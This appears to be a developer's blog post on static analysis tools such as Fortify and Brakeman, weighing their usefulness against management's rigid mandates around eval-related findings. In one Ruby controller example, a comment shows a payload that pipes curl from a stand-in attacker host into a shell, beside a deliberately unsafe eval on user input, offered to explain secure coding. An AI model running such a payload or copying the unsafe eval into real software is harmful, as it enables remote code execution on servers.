My Love/Hate Relationship With Static Code Analysis Tools

I have a love/hate relationship with static code analysis tools. On the one hand, they’re great at helping teams eliminate substandard code practices, especially those that may result in security problems. On the other hand, they’re also widely misunderstood and misused, most often by management.

On the face of it, static code analysis tools like Fortify (a commercial tool — probably the one with the most name recognition) and Brakeman (the best tool for Ruby/Rails code) seem like an awesome idea. Rather than relying on diverse software development teams throughout the organization to properly and regularly follow best practices for coding and handling application security, let’s encode the best practices into a tool that will parse and analyze the team’s code and point out deficiencies.

Let’s parse that last sentence above a bit more closely. There are two phrases that are potentially problematic: “best practices” and “deficiencies.”

Who decides on the best practices that need to be followed? And who says that code is deficient if it doesn’t meet a best practice that the tool checks for?

The reality is that it requires judgement to assess whether a “deficiency” pointed out by a static code analysis tool is actually a problem that needs to be addressed. The only people with the technical understanding to exercise this judgement are typically the members of the development team.

It could be that the tool is overzealous in pointing out a particular type of flaw. This is true, for example, with Brakeman, which essentially attempts to stamp out metaprogramming altogether: it flags every instance of dynamic code generation using eval().
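As an illustration, here’s a minimal, hypothetical sketch of that kind of dynamic code generation. The class and setting names are my own invention, and nothing here ever touches user input:

```ruby
# A contrived but benign use of eval: generating reader methods from a
# fixed, hard-coded list of setting names at class-definition time.
class Config
  SETTINGS = %w[timeout retries verbose].freeze

  SETTINGS.each do |name|
    # The string handed to eval is assembled entirely from the constant
    # above. No user input can ever reach it, but a tool that flags
    # every eval will still report this line as a finding.
    eval("def #{name}; @#{name}; end")
  end
end
```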

Using eval() is not evil. It’s part of the Ruby language for a reason. It is potentially problematic if the code being executed by eval() is derived from user input, since a nefarious user could try to compromise the system. But determining whether a given use of eval() actually is a problem requires judgement, which in turn requires an understanding of the technical context of the code.
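To make that judgement call concrete, here’s a hedged sketch, set in a hypothetical Rails controller, contrasting an eval() that is a genuine security hole with a whitelist approach that avoids evaluating user input at all:

```ruby
class ReportsController < ApplicationController
  # DANGEROUS: the evaluated string comes straight from user input.
  # A request like ?formula=system('curl evil.example | sh') would
  # execute arbitrary code on the server. This one deserves the flag.
  def unsafe_calculate
    render plain: eval(params[:formula]).to_s
  end

  # Safer: map user input onto a fixed whitelist of operations, so the
  # user selects behavior but never supplies code to be evaluated.
  ALLOWED_OPS = {
    "sum"  => ->(values) { values.sum },
    "mean" => ->(values) { values.sum.to_f / values.size }
  }.freeze

  def calculate
    op = ALLOWED_OPS.fetch(params[:op]) { return head :bad_request }
    render plain: op.call(Array(params[:values]).map(&:to_f)).to_s
  end
end
```

The first method is the case the tool exists to catch; the second is the shape a fix usually takes. The judgement lies in telling which camp a flagged line actually falls into.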

As a developer, I want to write the best code possible. I love static code analysis tools because they help me identify potential problems in my code. I’m capable of exercising the judgement to determine what does, and does not, need to be changed.

However, that determination is often not in my hands, and that’s when I start hating this type of tool. You see, management loves static code analysis tools.

Fundamentally, management doesn’t understand what software developers are doing, and that’s uncomfortable for them. Ultimately, management is responsible for what software development teams create, but typically doesn’t have a deep understanding of the end result.

Accordingly, management clings to static code analysis tools the way a drowning man latches onto a life preserver. It’s a way for them to verify that good software is being produced. It’s the ultimate checkbox.

This is how using Fortify becomes a mandated best practice for government projects. Even for Ruby products, and even when the Fortify module for analyzing Ruby code is simply awful.

Even worse, once the use of static code analysis tools becomes mandated, other rules get added on. “You must submit a copy of your Fortify results with each software release.” And my favorite: “You must provide a detailed, written justification for each deficiency that is not corrected.”

This is where I start to hate static code analysis tools. Because now I have to waste valuable time writing a justification, for a non-technical person who doesn’t really understand the issues, explaining why I didn’t fix a “deficiency” in the code. Management often doesn’t understand that false positives happen, or that dynamic code generation (in the case of Ruby) is useful.

This is why I have a love/hate relationship with tools like Fortify and Brakeman. I love them because they help me, and my teams, to write better, more secure code. But I hate being bludgeoned by their results when the capacity to properly evaluate their output is taken away by management.
